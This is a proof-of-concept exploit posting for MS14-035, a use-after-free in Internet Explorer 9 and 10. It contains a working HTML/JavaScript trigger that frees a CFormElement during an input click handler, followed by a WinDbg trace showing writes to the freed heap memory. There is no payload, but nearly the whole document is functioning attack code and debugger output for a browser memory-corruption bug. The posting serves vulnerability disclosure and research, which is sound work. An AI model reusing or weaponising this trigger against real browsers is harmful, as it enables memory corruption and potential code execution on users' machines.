Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Window 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>

<body>


<form id="form1">
   <input id="input1" type="text" value="">
</form>


<script>

	loaded = false ;

function func()	{

	if (loaded)	{
		document.body.innerHTML = "" ; // free CFormElement
	}

}

    
	input1 = document.getElementById("input1") ;
	input1.onclick = func ;
	loaded = true ;
	input1.click(); // Call DoClick function
	
	


</script>
</body>

</html>
<!--
Vulnerability details

MSHTML!CInput::DoClick

66943670 8bcf            mov     ecx,edi
66943672 ff751c          push    dword ptr [ebp+1Ch]
66943675 ff7518          push    dword ptr [ebp+18h]
66943678 ff7514          push    dword ptr [ebp+14h]
6694367b ff7510          push    dword ptr [ebp+10h]
6694367e ff750c          push    dword ptr [ebp+0Ch]
66943681 ff7508          push    dword ptr [ebp+8]  <---- esi = CFormElement
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi
66943689 85db            test    ebx,ebx 
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400        and     dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668fe        and     dword ptr [esi+68h],0FFFFFFFEh  ; memory corruption, write to freed memory

 MSHTML!CInput::DoClick+0x60:
66943681 ff7508          push    dword ptr [ebp+8]    ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20  6661ead8 MSHTML!CFormElement::`vftable'



0:005> !heap -x esi <-- esi contains valid pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78      -            c  LFH;busy 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85db            test    ebx,ebx
0:005> dds esi l1
0034cd20  6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c




0:005> !heap -x esi <-- esi contains freed pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78      -            0  LFH;free 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)  [br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400        and     dword ptr [esi+64h],0 ds:0023:0034cd84=00000001


-->